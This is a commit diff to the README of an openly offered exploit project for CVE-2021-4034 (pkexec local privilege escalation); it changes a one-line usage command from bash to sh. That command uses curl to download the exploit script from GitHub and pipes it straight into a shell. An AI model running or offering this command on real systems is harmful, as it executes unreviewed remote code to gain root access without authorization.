change bash to sh in readme

This commit is contained in:
Oliver Lyak ly4k 2022-01-27 20:43:49 +01:00
parent f1728c9e21
commit 2a87d76fc3

View File

@ -7,7 +7,7 @@ Self-contained exploit for CVE-2021-4034 - Pkexec Local Privilege Escalation
Should work out of the box on vulnerable Linux distributions based on Ubuntu, Debian, Fedora, and CentOS. Should work out of the box on vulnerable Linux distributions based on Ubuntu, Debian, Fedora, and CentOS.
```bash ```bash
bash -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)" sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"
``` ```
### Manual ### Manual